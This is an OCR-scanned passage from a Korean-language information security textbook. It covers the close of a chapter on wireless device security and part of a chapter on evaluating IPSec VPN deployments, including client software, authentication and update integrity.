화기들을 새로 사지 않으면 안되게 되여 있다. 이것으로 하여 이 대안이 성숙되여 대중 
화되 려 면 시 간이 일정하게 걸릴 것 이 다. 

이 것 들은 무선 인 터네 트장치 들의 말단사이 암호화를 보장하는 유일한 방도들로는 
되지 않는다. 현재 추진중에 있는 기 타 방도들에는 응용준위 에서의 암호화적 용，이동 
전화의 SIM 카드에 암호화열쇠와 암호화알고리듬의 추가， WAP 기술사항의 갱신에 보 
다 강력 한 암호화기 법 들을 추가하여 《 WAP 의 빈 구석》을 완전히 메꾸는것 등도 포 
함되 여 있다. 


결 론 

정보보안분야의 여러 전문가들에게 권고하려는 두가지 사항이 있다. 

• 무선보안문제점 들과 대 안들의 추세 를 놓치 지 말것 . 

• 무선장치들을 홀시하지 말것. 

정 보기 술과 정 보보안전문가들에 게 는 새 로 나오는 무선인터네 트도구들을 개 인용소도 
구나 기 업 인의 장난감 등으로 왜소하게 대 하는 관점 이 있다. 이들은 회사의 PC 들과 봉사 
기들, 망들을 보호하느라고 너무나도 바쁘기때문에 그 어떤 새로운 형의 장치들이 나왔 
다 해 도 그에 대 하여 걱정할 시 간조차 없다. 회 사들의 보안방책 에서는 대 부분 이동전화 
와 갈은 휴대형장치들에 대한 규제사항조차 없으나 일부 회사들은 이러한 장치들을 리용 
하여 자기의 내부전자우편을 교환하고 있는 실정이다. 여기서 일반적으로 잘못 생각하고 
있는것은《이 장치들이 너무나도 작은데 이 작은 장치들이 무슨 해를 끼치겠는가.》하 
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는것 이 다. 

보안부서들은 지금까지 대형를퓨터로부터 분산되여 있는 PC 들로 정보자산이 흘러 
가는것과 씨름질해야 하였다. 보안의 초점을 어디에 맞추어야 하겠는가에 대하여 회 
사들의 관점은 대체로 일정한 정도로 개변되여야 하였다. 과장이 없이 말하여 회사의 
콤퓨터사용환경은 또하나의 중요한 이행과정을 겪고 있다. 회사의 정보자산이 무선장 
치에 의해 접근되고 있다는것은 몇년동안 무선노트형콤퓨터가 무선접근을 하여 왔기 
때문인것이라기보다 그 접근도구가 점점 값이 눅으며 따라서 그 대수가 굉장히 늘어 
날수 있기때 문이 다. 3,000$짜리 노트형 콤퓨터 를 사용하지 않고 이제 는 사용자(혹은 침 
입 자)가 40$짜리 인터네 트통신이 가능한 이동전화 한대 를 가지 고 어 느 곳에서 든지 기 
밀적인 회사망에 간단히 쳐들어 올수 있게 되였다. 앞으로도 이 이동통신장치들의 처 
리능력，기 억 용량，대 역 너 비, 보관，사용상 편의 가 계 속 개 선될것 이 며 결국에 는 대 중성 
이 상당히 증가할것이다. 바로 이 마지막항목을 실현하는데 회사의 자원이 불가피하 
게 소모될것이다. 

이 장치들은 작지만 기관의 기밀자료들에 접근하기만 하면 를퓨터만큼 일을 잘할 
수 있 고 손해 도 끼칠 수 있다. 정 보보안적안목에 서 이 장치 들을 무시하거 나 쓰지 못하 
게 하면 두가지 결과가 초래될수 있다. 첫째로，기관내의 영업단위들이나 간부들이 무 
선장치 와 무선봉사를 추진시켜 대 개 성 공적 으로 도입 은 하면서 도 정 보보안부서 의 개 
입이나 지도를 완전히 차단해 치울수 있다. 이렇게 되면 불피코 정보보안부서들은 썩 
후에야 알게 되지만 정확한 설계와 계획을 하게끔 도와 주기에는 너무나도 때 늦은것 
이 다. 

둘째 로, 무선장치들과 그 능력들에 대 하여 무시해 버리는 경 우 정 보보안부서 는 누구 
도 돌보지 않고 무방비상태로 된 창문을 공격자들에게 열어 줄수 있다. 이러한 기관들은 
무선장치를 사용한 공격만 있으면 꼼짝 못하고 녹아 나게 된다. 

무선장치 들을 단순한 소기구들이 나 시끄러 운것 으로 여 기지 말아야 한다. 이 장치 
들은 일단 기관의 귀중한 정보자산으로 침투해 들어 가면 무차별적이며 망의 그 어느 
마디와도 꼭 같은 역할을 한다. 추세에 민감하고 준비 있는 전문가로 되자면 정보보안 
실 천 가들은 무선기 술과 관련 한 보도자료들과 보안문제점 들을 다 알고 있 어 야 한다. 또 
한 응용프로그람작성 자들과 련합하여 사업함으로써 이 장에 서 언급된 많은 문제 점 들을 
무선응용설 계 에 포함시키 도록 하여 야 할것 이 다. 그리 고 최 종적 으로는 각 기 관들에 서 
정 보보안방책 에 의해 보호되 고 있는 장치 들의 부류를 확장하여 무선장치들까지 포함할 
수 있게 해야 한다. 그것은 효과상 이 무선장치들이 기관의 하부시설의 또하나의 구성 
요소로 되기때문이다. 
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제 9 장. 가상개별망배비와 평가전략 


케이스 파슬리 


최근년간 가상개별망 ( VPN ) 기술은 그 성능과 사용상 편리，설치，관리도구효과성 등의 
분야에서 급속히 발전하였다. VPN 기술에 대한 시장의 요구도 급속히 높아 가고 있다. 
이와 함께 여러가지 VPN 관련제품들의 수가 늘어 나고 있다. 원가절약이라는 약속이 빈 
말로 되지 않고 실지 현실화되고 있다. 그러 나 기술적 및 상업적견지 에서 볼 때 VPN 에 
대한 새로운 희망이 있다. 오늘 빠른 속도로 발전하고 있는 기업환경에서 관리，설치，규 
모조절 이 매우 쉬운 VPN 체 계 를 담보하는것은 정 확한 VPN 체 계 를 선택 하고 실행하는 문 
제 가 제기될 때 매우 중요한 성공의 요인으로 된다. 기 업적인 견지 에서 현실적 인 리 익으 
로 되는 점은 다음과 갈다. 

• 영 업동반자나 고객들과의 보다 밀접한 련계 로 인한 경쟁 력향상 

• 봉사제 공의 새 로운 통로 

• 적은 원가로 새로운 시장진출 

• 지 난 시기 골치거 리로 되 였던 보안상 우려를 해소하고 보다 높은 가치의 정보를 
제공하는것 

선택할것이 많은 조건에서 최적의것을 어떻게 결정하겠는가. 객관적인 기준이 있어 
판매업체의 상품소개내용을 공정하게 평가할 필요가 있다. 업체의 성능소개에 대한 평 
가를 할 때 무엇을 중시해야 하겠는가. VPN 체계에서 그밖에 또 리익으로 되는 점은 무 
엇인가. 일부 경 우에 보안관리봉사제 공자에 게 자문을 위 탁해 보는것 도 하나의 대 안이 
될수 있다. 보안관리봉사제 공자란 표준적 으로 보안응용프로그람들을 가지 고 그것 을 거 
래식 으로 리용하면서 보안관리 를 봉사해 주는 외 부의 자원제 공자 ( outsourcer ) 를 말한다. 
많은 기 업 들은 VPN 의 설 치관리 를 맡아 해 주는 보안관리봉사제 공자들에 게 VPN 을 위 탁 
하는것 을 고려 중에 있 다. 그것 은 자체 의 기 술인원들보다 대 형 VPN 을 더잘 운영해 나갈 
수 있는 전문인력과 관리구조를 바로 이 보안관리봉사제공자들이 가지고 있기때문이다. 

VPN 의 성능은 새로운 VPN 제품판본들이 나옴에 따라 계속 질이 개선되고 있다. 성 
능이 높은것이기는 하지만 VPN 선택에서 그것이 가장 중요한 기준이겠는가. 그렇지 않다. 
속도는 빠르지만 침 입 당하기 쉬운 VPN 의 도입은 보안상 리로운 점 이 없을것 이 다. 성능 
역시 판정하기 어려우며 많은 경우 성능시험은 제대로 잘되지 않으며 한갖 현실세계의 
환경 을 흉내낸데 지 나지 않는다. 판매 업 체 들의 성 능광고도 매 우 구체 적 으로 재 판정해 보 
아야 한다. 그것은 시장실현위주의 관점에서 성능을 지나치게 과장하여 광고함으로써 현 
실에서는 제대로 성능이 나오지 않기때문이다. 판매업체들이 어떤 시험방법을 이러한 성 
능광고의 기 초로 써먹 는가를 아는것 이 중요하다. 

이 장에서는 VPN 과 그 관련제품 선택과 도입에서 정보보안전문가들이 부닥치는 여 
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러 가지 문제들에 대 답을 주려 고 한다. 


VPN 이란 무엇인가 


VPN 은 사적 인 정 보가 인 터네 트와 같은 공공망을 통하여 다른 곳에 전송되 게 하 
는 망을 말한다. 하나의 VPN 은 망체 계밖의 확장부분이 며 따라서 VPN 에 속한 모든 
입구점들에서 망보안방책을 통일적으로 실현할수 있는 능력을 가져야 한다. 교갑화와 
암호화를 통하여 자료가 공공망으로 전송될 때 그 비밀성은 담보된다. 이 기술을 적 
절히 리용하여 얻을수 있는 기술적인 리익은 기업운영원가의 절약，망접근보안의 개 
선，중계시 자료의 무결성，사용자 및 자료인증과 자료의 비밀성보장이다. 그러나 일 
부 재정적인 리익이 있다 해도 VPN 구매후에 생기는 VPN 체계의 실지비용 즉 배비， 
관리，지원 등에 드는 비용으로 하여 총체적으로는 재정적리익이 얼마 없다. 판매업체 
는 관리성，배비성，규모조절성의 향상에 대한 약속을 제시함으로써 자기의 제품들과 
경쟁자들의 제품을 뚜렷이 구별되게 할수 있다. 이러한 형식의 제품구별화전략이 더 
욱 중요한것 은 대 부분의 업 체 들이 제 작하는 VPN 제 품들이 동일한 VPN 규약인 IPSec 와 
기 타 보안기 술을 리용하기때 문이 다. IPSec 는 하나의 국제 규격 으로서 인 터네 트규약에 
대 한 보안적보충안들을 규제 하고 있다. VPN 의 실현에 쓰이 는 다른 안전한 런넬 화 
( tunneling ) 규약도 있지 만 IPSec 는 모든 규약들가운데서 주도적 인 위 치를 차지 해 왔다. 
이 규격 은 최 소수준의 판매 자 운용호환성 에 대 처하는 의 무조항을 포함하고 있 다. 정 
보보안전문가들은 이 장의 도움을 받아 IPSec VPN 대 안을 평 가할 때 리용할수 있는 
한조의 기준을 찾아 낼수 있을것이다. 설명은 VPN 응용프로그람을 고찰하는것으로부 
터 시작된다. 


IPSec VPN 응용프로그람 


기업들이 가상개별망 ( VPN ) 을 호기심나서 바라보게 된것은 그것이 네가지 응용적요 
구 즉 완전접 근，싸이트별 인트라네 트，안전 한 엑 스트라네 트，안전한 내 부망을 만족시 
키기때 문이 다. 대부분의 경우 기술적촉매 에서의 목적 은 합법적 인 사용자들에 게 접근조 
종을 제 공함으로써 망자료자원(봉사기파일，디 스크공유 등)을 보호하는것 이 다. 또한 기 
업적측면에서의 목적은 망하부구조의 원가를 낮추고 내부 및 외부 기 업정보흐름을 원 
활히 높임으로써 사용자의 생산성과 경쟁력을 높이며 기업동반자들과의 관계의 강화를 
보장하는것 이 다. 

VPN 평 가계 획 에서 나서 는 과업 들을 명 시하는것 은 좋은 생 각이 다. 과제표를 잘 만들 
면 평가가 초점 있게 될수 있으며 평가완결에 필요한 자원들을 예견할수 있을것이다. 표 
9 一 1 에 는 VPN 평 가계 획 과제 가 례 로 제 시 되 였 다. 
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표 9-1 VPN 평가계획과제 


• 자료보안요구사항을 설정한다. 

• 사용자를 분류한다. 

• 사용자위 치를 설정한다. 

• 망련결상태와 접근요구사항을 결정한다. 

• 제품 및 봉사제공자를 선정한다. 

• 어떤 하드웨어/쏘프트웨어를 구입할것 인가를 결정한다. 

• 시험운영실을 설치 한다. 

• 평가장치들을 구입 한다. 

• 특성요구사항에 기초하여 제품검수를 진행한다. 

• 시험프로그람을 실행한다. 


원격접근 VPN 

원격접근 VPN 에는 두가지 부분 즉 봉사기와 의뢰기 가 있다. 그것들은 서 로 다른 두 
가지 목표가 있으므로 그 평 가기준도 달라야 한다. 

• 기업적목표 원거리통신비의 저하，종업원생산능률의 증가 

• 기술적목표 원격 근무자 (remote worker) 에게 국부망에서와 꼭 같은 안전한 접근을 
제공하는것 

이 장에서는 역 할과 기준의 두 측면에 대 하여 다 보게 된다. 

원격접근 IPSec VPN 은 사용자들이 어느 때나 어느 곳에서나 어느것을 요구해도 기업 
공동의 자원에 접근할수 있게 한다. 

원격접 근 VPN 은 상사기 술，전화기술，수자식종합통신망 (ISDN) 기 술，수자식 가입 자회 선 
(DSL), 이 동통신 IP 기 술，케 블인 터네 트접 근기 술들을 IPSec 와 같은 보안규약들과 함께 리 용 
하여 이 동전화사용자들파 원격 근무자 (telecommuter) 들에 게 안전한 접 속을 보장해 준다. 

의릐기쏘프트웨어 원격접 근사용자들에 는 원격근무자，이 동근무자 (mobile worker), 려 행 
근무자 등 먼 거리에서 자기 회사의 자료에 접속하는 사람들이 속한다. 가장 많이 사용 
하는 조작체 계 로는 현재 회 사탁상형 콤퓨터표준으로 흔히 쓰는 Microsoft Windows 이 다. 
IPSec VPN 의 체 계 요구상 Macintosh, Unix, Palm OS 혹은 Microsoft Pocket PCAVindows 
CE 도 지 원될수 있다. 더 좋기는 IPSec VPN 판매 업체 가 회 사가 요구하는 의뢰기형태들을 
적 당히 배 합하여 제 공해 줄수도 있다. 이동근무자들은 때 로 판매예 보，비밀적 인 환자정 보 
나 법적정보，고객명단，기밀적이지만 비밀분류가 아직 되지 않은 국방성정보나 사법관계 
정보 등 가치가 크고 위험도가 높은 기관자료들에 접근해야 할 필요가 있다. 원격접근은 
또한 동등위 치접 근을 하여 인 터네 트(례하면 Microsoft NetMeeting) 상으로 정 보협 력한다는 
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것 을 의 미 하며 원격 기 술지 원도 가능하다는것 을 의 미 한다. 

이것 을 응용하기 위한 의뢰기하드웨 어의 가동환경들에는 PDA (개 인휴대 형정 보처 리 
기 )，무릎형 콤퓨터，가정 용탁상형 콤퓨터，휴대 형호출기，자료처 리이 동전화와 기 타 유선 및 
무선망설비들이 있다. 

하드웨 어가동환경 기 술이 발전함에 따라 회 사자료를 원격접 근할수 있는 기 타 제 품들 
이 계속 나올것이다. 인기를 끌며 계속 사용자수가 늘어 나고 있는것은 PDA , 이동전화와 
같은 무선기구들과 원격접근 IPSec VPN 응용접근가동환경과 같은 휴대성이 높은 망관련장 
치 들이다. 무선기구들에서 제 기 되는 문제들은 유선 IPSec VPN 가동환경들에서 제 기되는 
문제 들과 득 같은데 그런것 들로는 물리 적보안，자료보안뿐아니 라 계 산이 힘 든 기 구들에 서 
의 암호화설명을 들수 있다. 

PDA 와 같은 무선 IPSec VPN 에서 제기되는 또 하나의 문제는《유선세계》의 보안 
규약과의 호환성 이다. 《 무선응용규약 ( WAP ) 연단》이 라고 부르는 무선규약표준화기구는 
WAP 에 의 하여 규정 된 보안규약인《 무선전송층보안》 ( WTLS ) 과 SSL 과 같은 유선계 통의 
보안규약사이의 호환성을 개선하기 위하여 노력 하고 있다. 업계의 관측자들은 PDA 나 자 
료처 리 이동전화와 같은 무선기 구들은 원격호상자료접 근을 요구하는 응용분야에 서 가장 
인기 있는 가동환경으로 될것 이 라고 예측하고 있다. 그러 나 이 기구들은 작아서 쉽게 도 
난 당하거 나 잃 어 버 릴수 있다. 바로 이 것 으로 하여 하드웨 어가동환경 의 물리 적보안을 
IPSec VPN 의 뢰 기 쏘프트웨어 의 특징분석 에 서 그 평 가기 준의 하나로 보아야 하는것 이 다. 
이 가동환경 들을 위한 물리 적보안통제 수단으로는 케 블, 자물쇠，계 렬 번호추적，움직 임 수 
감기，위 치 측정 식 추적 (지 구위 치 측정 체 계 인 GPS 를 리 용하여 )，지 문스캔과 결 합된 음성 확인 
과 갈은 생체계측식인증을 들수 있다. 

원격접근을 위한 통신은 전화를 중심으로 계속 발전하는것이 주되는 추세로 되고 있 
다. 무선광대역접 근방식 의 사용도 계 속 늘어 나는 추세 를 보이 고 있 다. 그러 나 광대역 방 
식의 실현에서 초기에 나타났던 복잡한 문제들과 일련의 지리적제한성들이 최근년간 상 
당히 해 결되 였으므로 전화회 선리용보다 광대역무선리용이 더 증가할것 으로 보인다. 

광대역 ( DSL ， 케 블모뎀 )사용에 서 나서는 한가지 문제 는 봉사도 상품이 므로 광대역 제 
공업체 들이 자기 의 망봉사를 마디화하려 고 하는것 이 다. 인 터네 트접 근을 위한 케 블봉사에 
서 나타나는 한가지 전술은 가정 에 있는 사용자들이 IPSec VPN 을 리용하지 못하게 하는 
것 이 다. 북아메 리 카의 서부해 안에 있는 한 케 블봉사회 사에 의하면 거 주형 IP&c VPN 사용 
자들로 하여 생기는 망부하때문에 대역너비가 영향을 받는다는것이다. 그리하여 이 케블 
봉사회사는 가정형고객들에 의한 모든 VPN 사용을 금지시키고 케블모뎀에 있는 규약파케 
트러과규칙과 포구를 사용하게 하였다. 이것으로 회사는 분명 리익을 보는데 그것은 가 
정 형 고객 들의 통신을 VPN 경 로조정 하여 인터네 트에 련결시 켜 줌으로써 그들에 게서 더 높 
은 기 업준위 에서 의 사용료를 받아 내 기 때 문이 다. 일부 회 사들은 이 에 대 응하여 전매 특허 
VPN 을 내놓았는데 여 기서 는 VPN 유효부하량을 허 용된 규약(례하면 HTTP 파케트)에 교갑 
화하여 이 케 블봉사회사의 제 한조치를 우회하게 하였다. 이 문제 가 어 떻게 해결되 여 나 
가겠는지 는 아직 도 두고 보아야 하겠지 만 VPN 형 식 을 선택할 때 다른 하나의 기 준도 고 
려 해 야 한다는것 을 알수 있 다. 즉 이 VPN 형 식 이 말단사용자의 인 터네 트봉사제 공자 ( ISP ) 
혹은 망접 근제 공자의 망에 서 잘되 겠는가，원격말단사용자들이 자기 지 역 준위 의 ISP 를 사 
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용하겠는지，아니면 회사가 기업준위의 접근을 구매하여 지속적이며 신뢰성 있는 련결을 
보장해 주겠는지를 고려해 보아야 한다. 

말단사용자들이 관심하는것은 자기들이 해야 할 일을 하고 그 보수를 받는것뿐이다. 
대체로 사용자들은 자기들의 원격접근련계의 보안에 대해서는 별로 관심하지 않는다. 사 
용자들이 일상적 으로 관심 하는것 은 사용상 편리，신뢰 도，자기 콤퓨터 의 현존응용프로그람 
들과의 호환성 등이다. 

따 라서 전 반적 인 평 가전 략을 위 해 서 는 VPN 의 퇴 기 를 실 지 생 활에 서 사용자가 쓰는것 
과 득 갈은 원격 가동환경 설정값을 가지 고 완전가동시 험 을 해보는것 도 필요하다. 실례 로 
일부 판매 업체의 개 인용방화벽 이 다른 업체의 IPSec VPN 의뢰기와 충돌할수도 있다. 이 
런 비호환성은 판매업체와 련계를 맺으면 해결될수도 있고 해결 안될수도 있으나 이렇게 
되면 해당 해결책에서 제외되게 된다. IPSec VPN 의뢰기비호환성의 다른 실례는 한 업체 
의 IPSec VPN 의뢰기 가 IPSec VPN 봉사기 나 다른 IPSec VPN 의뢰 기의 동일한 파라메 터 들 
을 지원하지 않는데서도 볼수 있다. 여기서 잊지 말아야 할것은 표준은 흔히 최소수준의 
의 무적특성 들만 규제해 준다는것 이 다. 자기 회 사의 제 품을 다른것 들과 구별 할 목적 으로 
업체들은 보다 발전된 특징이나 기능 즉 표준화되지 않은 특성들을 추가하는것이다. 또 
한 업체들은 자기 IPSec VPN 봉사기와 가장 잘 호응되게끔 자기의 IPSec VPN 의뢰기를 
최 량화할수도 있 는것 이 다. 이 런 리유로 하여 전반적 IPSec VPN 체 계 의 성 능과 보안수준을 
낮출수 있는 공통적 인 설정 의 사용이라는 업 체혼용방식 이 있게 된다. 실례 를 들어 보면 
일부 IPSec VPN 봉사기판매업체들은 표준화가 명백히 되지도 않은 인증규약을 지원하고 
있다. 명 백하건대 선택된 IPSec VPN 의뢰기 가 동일한 IPSec VPN 봉사기 제 공업 체 에서 만 
든것이 아니여서 운용호환성이 잘되지 않으면 기준상 타협을 하든지 아니면 그 업체를 
포기해 야 할것 이 다. 

인터네트가 더 욱더 널 리 퍼지 고 가입 자들이 더 오래 혹은 항상 련결상태 로 있기때 문 
에 원격 VPN 사용자들의 콤퓨터가 공격을 받을수 있는 기회는 더 많이 조성된다. 따라서 
원격사용자의 를퓨터 에 귀중한 자료가 보관되 여 있다면 일정한 형 태의 파일암호화나 디 
스크암호화해 놓는것 이 좋다. 암호화는 처 리소자에 부하를 많이 주는 과정 이 므로 그 콤 
퓨터의 계산자원이 증가하는것은 필수적 이 다. 여기 에서 목적은 자료들을 휴대형콤퓨터 에 
가지 고 다니더 라도 결국 귀 중한 그 자료들을 남이 제마음대 로 훔쳐 보지 못하게 하자는 
것 이 다. 일부 VPN 의 뢰 기 용쏘프트웨 어 에 는 비 루스방지 프로그람，분산형 탁상형 콤퓨터 용방 
화벽프로그람，탁상형 를퓨터침 입방지프로그람，파일/디 스크암호화프로그람이 있 다. 이 런것 
들은 일부 경우 필요이상의것으로도 될수 있지만 탁상형콤퓨터급에서도 보안이 얼마나 
심화되여야 하는가를 보여 준다. 여기에 강력인증체계와 수자식서명체계를 도입한다면 
보안위 험 은 감소된 다. 앞에 서 언급한것 들은 전화회 선사용자들에 게 도 적 용된 다. 즉 어 느 
때 든 전화회 선을 통하여 콤퓨터 에 련결 하면 공개접 근이 가능하며 따라서 공격할수 있는 
IP 주소를 받게 된다. 

VPN 의뢰기의 무결성문제도 고려되 여 야 한다. 실례 로 VPN 의뢰기 가 VPN 봉사기 에서 
의 보안방책갱신 혹은 보안설정갱신을 인증할수 있는 능력이 있는지，사용자가 일정하게 
조절협 력 해 야 갱 신이 성 과적 으로 수행 되 는지 잘 알수는 없 다. VPN 의 뢰기보안관계갱 신작 
업 과 관련 하여 보면 사용자가 약한 고리 로 될 수 있 다. 사용자의 참가가 없 이 VPN 의 뢰기 
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설정 을 안전하게 자동적 으로 해주는 VPN 의뢰기를 고려해 보는것 이 좋다. 항비루스체계 
도 응당 있어야 한다. 그것은 트로이목마나 비루스가 VPN 체계를 비법적으로 조작해 놓 
을수 있는 가능성 이 있기때 문이 다. VPN 의뢰기 가 탁상형콤퓨터용항비 루스프로그람과 호 
환되 는지(혹은 가지 고 있는지)도 알아 보아야 한다. 지난 시기 에는 해커들이 목적 없이 돌 
아 다니 며 취 약한 곳을 찾아 다녔 다면 최 근에 는 특정한 목적 을 가지 고 겨 냥한 대 상에 대 
하여 공격하는 비률이 크게 늘어 나고 있다. 이러한 공격형태로는 VPN 입구점들을 통하 
여 서로 조정하고 공격하는것이다. 이렇게 되면 결심을 품은 공격자는 중앙싸이트에 접 
속한 원격 VPN 사용자들을 체계적으로 녹여 낼수 있게 된다. 따라서 분산형탁상형콤퓨터 
용방화벽과 탁상형콤퓨터용침 입탐지체 계를 사용함으로써 VPN 의 뢰기를 보호할수 있는 요 
구도 제기할 필요가 있다. 

분산형탁상형콤퓨터방화벽 의 주요특징 은 기 관내 의 모든 탁상형 콤퓨터 들에 대 한 방화 
벽방책 을 중앙조종으로 관리할수 있다는것 이 다. 개 인용방화벽 은 그 이 름이 보여 주듯이 
개 별적 인 소비 자들에게 판매 되는 방화벽 이다. 개 인용방화벽의 방책유지 는 사용자가 책 임 
진다. 분산형방화벽 은 원격 VPN 사용자접 속을 비 롯한 내 부망의 모든 입 구점 들에 서 일 관한 
망보안방책을 중앙적 으로 실시할 필요가 있는 기 업들에 판매된다. IPSec VPN 의뢰기 와 
중앙관리조종판에 보고를 제 출하는 침 입탐지체 계를 함께 전개하면 계속되 던 망공격 이 나 
침입이 현저히 해소되고 호상 련결되여 기업의 보안상태를 잘 알수 있을것이다. 

리상적 으로는 IPSec VPN 의뢰기와 함께 항비 루스체 계，탁상형를퓨터용침 입탐지체 계， 
분산형방화벽 등을 같이 판매 업 체 들에 서 구입하면 좋을것 이 다. 그런 정 도의 집 적 도나 종 
합도를 가진 제 품이면 탁상형 콤퓨터 의 보안방책관리 의 효률성 을 상당히 높일수 있 다. 

의릐기전개 원격접 근 VPN 의 뢰기 쏘프트웨어 를 전개하는 문제 들은 주로 운영적 인 문 
제 로서 SQL 의 뢰기 쏘프트웨어 와 같은 분산형쏘프트웨어 에서 제 기된다. 원격접 근 VPN 의 
뢰 기 쏘프트웨어 를 전개하는데 필요한 쏘프트웨 어관리지 식 과 방법 론들은 허 다하다. 

VPN 의뢰기의 전개성 을 검 토할 때 여 러 가지 문제점 들을 고려하여 야 한다. 그중 하나 
는 VPN 의 뢰기 쏘프트웨어 의 파일 크기 이 다. 현재 가장 광범히 사용되 는 먼거 리접 근방식인 
저속전화회선망을 통하여 의뢰기쏘프트웨어가 배포된다면 이것은 중요한 문제로 된다. 
만약 배 포용 FTP 봉사기 같은데서 파일 내 리 적재 가 너 무 시 간이 걸린다면 사용자들은 시 끄 
러워서 그 파일이나 그후 갱신판을 내리적재하지 않을것이다. 싫증을 느낀 사용자들이 
있으면 VPN 의 실현이 지 연될것 이며 결국 총적 인 VPN 실현원가가 높아 질것 이다. 이 문 
제를 풀수 있는 전개전략의 하나는 VPN 의뢰기를 초기에 디스케트나 CD-ROM 과 같은 
이동성매체에 담아 배포하는것이다. 자료압축기술을 쓰면 배포판의 크기는 상당히 줄어 
들것이다. 대부분의 판매업체들은 관리자가 일부 초기설정을 미리 할수 있는 일종의 의 
퇴 기 설정편의프로그람들을 먼저 배 포한 다음 매 원격 사용자들에 게 설 치 파일을 배 포한다. 
가능한 VPN 의뢰기배포방법 으로는 Web 싸이트나 FTP 싸이트에 우편을 보내는것도 있을수 
있다. Web 싸이트， FTP 싸이트 혹은 다른 직결파일전송방법 을 리용할 때 VPN 의뢰기 설치 
파일 에 비 법 접 근할수 있는 경 우도 있 다는것 을 정 보보안전문가들은 고려해 야 한다. 일부 
회 사들은 설 치 파일 들을 직 접 대 인판매할수 있 다. 우편 및 전자우편을 통한 배 포의 위 험 
을 대범하게 받아 들일수도 있다. 또 일부는 개인식별번호 (HN) 나 특별한 통과암호구 
(passphrase) 를 통하여 접근을 허용하는 안전한 파일전송싸이트를 개설할수도 있다. VPN 
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의뢰기의 초기배포에 대하여 말하면 배포가능성은 손해를 얼마나 보는가에 따라 허용되 
는 위험한도만큼 제 한되게 된다. 특히 초기 VPN 의뢰기 가 미 리 설정되 여 있어 그 정 보를 
공격 자가 정 탐정보로 써먹 을수 있 게 되 는 경 우에 더 욱 그러 하다. 

의릐기관리문제 의뢰 기 관리 란 의뢰기설정， VPN 의뢰기 방책갱 신과정， VPN 의뢰기쏘프 
트웨 어판본갱 신 등에 대 한 운영적 인 유지 보수과정 을 말한다. 여기 에도 기성지식과 기성 
쏘프트웨 어 관리 방법 과는 다른 문제 들이 있어서 오늘 회 사들이 전개한 다른 형 태의 쏘프 
트웨어 들을 관리하는데 필요할것 이 다. 보충적 인 요인은 다름아닌 갱 신판에 대 한 사용자 
인증, VPN 리용성，갱 신본파일의 무결성，비밀성들이다. 사용자의 신임 장관리 능력은 VPN 
봉사기 관리문제 에 대 한 부분에 서 보기 로 한다. 

VPN 의뢰기 가 다른 하나의 내부망접근점 이므로 이 접근은 엄격한 사용자인증과 통제 
가 심한 VPN 설정 정 보를 필요로 한다. 많은 사람들은 가장 실용적 인 수준의 강력한 인증 
은 생체계측지표에 기초한것 이 라고 주장할것 이 다. 생체계측지표들과 병행하여 : HN 을 쓰 
면 이중인증으로 볼수 있다. 많은 보안전문가들이 다음으로 좋아하는 방법은 스마트카드 
에 내 장된 수자식 인증서 와 PIN 을 결 합하는것 이 다. 시 간형계 산카드(통표)와 단순통과암호 
들은 이제 와서는 낡은 방법으로 되고 있다. 그러나 많은 IPSec 판매업체들은 
IKE/IPSec (인 터네 트표준암호 열 쇠교환규약/인터네 트규약보안)표준에 XAUTH 라는 보충규 
약을 실행 하고 있다. XAUTH 에서는 IPSec 런넬을 설치할 때 사용자신원확인이 필요하면 
현재 가장 많이 쓰이 는 인증방법 인 RADIUS 와 같은 기 성 사용자인증방법 을 리용할수 있 
다. 보충적 인 리 익은 XAUTH 를 리용하면 회 사가 현존 인증기 반체 계를 리용할수 있으므 
로 낡은 기술에 투자를 계속 할수 있다는것이다. 결국 망의 변화가 적고 현존 사용자기 
륵부를 다시 리 용하기 때 문에 실 행 시 간과 실 행 비 용이 적 어 질 수 있 다는것 이 다. XAUTH 의 
사용에서 약점은 통과암호와 통표사용의 취약성이 커짐으로 하여 상대적으로 인증이 약 
하다는것 이 다. 

VPN 갱 신관봉사기 를 위 장할수 있는 가능성 이 있는것 으로 하여《 의뢰기쏘프트웨어 가 
자기가 설정갱신판파일을 받았다는것을 어떻게 봉사기에게 확인을 보내는가?》라는 심중 
한 물음이 제기된다. 수많은 형태의 설정배포판이 있음으로 하여 공격자 즉 해커가 사용 
자들에게 비 법적 으로 갱신판본을 보낼수 있는 가능성 이 많다. 이 위협에 대처하는 하나 
의 방안은 암호화기 술을 리용하고 갱 신판파일 에 수자식서명 을 하여 VPN 의뢰기 에 의한 
확인을 한후에야 접수하는 방식이다. 보충적인 보호방법은 원격사용자콤퓨터에 실지 설 
정 파일 이 상주하고 있으므로 이 설정파일을 암호화해 두는것 이 다. 흔히 쓰는 하나의 수법 
은 갱 신관본전송을 위하여 안전한 경 로，례하면 SSL 보다는 LDAP 를 택하는것 이 다. 

표 9 一 2 에 는 원격 접근 VPN 의 뢰 기 쏘프트웨 어 에 대 한 평 가항목의 례 가 제 시 되 여 있다. 
이것들은 VPN 의뢰기평 가기준을 작성할 때 고려해 야 할 항목들이다. 

원격접근봉사기 암호화런넬 전송흐름의 주요처 리는 VPN 봉사기 에서 진행된다 . VPN 봉 
사기는 하나의 런넬종합점으로 된다. 즉 원격접근의뢰기는 그 봉사기를 런넬말단점으로 
리용한다. VPN 봉사기 가 VPN 전송량을 효과적 으로 처 리하는 능력 이 있는가 하는것 을 알 
아 보는 방법 에 는 두가지 가 있 다. 첫번째 는 더 크고 빠른 하드웨 어장치 를 리용하여 처 리 
의 제 한점 을 극복해 보는것 이 다. 일체식하드웨 어 를 대 안으로 삼으려 면 하드웨 어의 성 능 
개 선이 있어 야 한다. 성 능향상이 늦어 지 면 범위 확대능력 이 올라 갈것 이 다. 이것은 흔히 
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표 9-2 


원격접근 VPN 의뢰기평가기준 


전제 : VPN 의뢰기가 중앙싸이트의 관리하에 있다는것을 전제로 한다. 

• 이동전화사용자의 탁상형 콤퓨터 의 안전을 위하여 파일/디 스크암호화가 필요할수 있 다. 

• 파일/디 스크암호화를 광범하게 리용하게 되 면 고성 능무릎형 콤퓨터 나 노트형 콤퓨터 가 
필요할수 있다. 

• VPN 중앙관리 자에 게 련결된 경 보신호장치 가 있는 락상형 콤퓨터용침 입탐지체 계 

• VPN 중앙관리 자에 게 련결된 경 보신호장치 가 있는 분산형탁상형 를퓨터 용방화벽 

• VPN 의 뢰 기 설 정 잠금능력 

• 사용자에 게 투명한 VPN 의뢰기갱 신 

• 암호화된 링 크를 통한 인증된 VPN 의뢰기갱 신판본 

• 운용호환성 이 필요한 경 우 최 신업 계 VPN 표준을 철저 히 지키 는것 


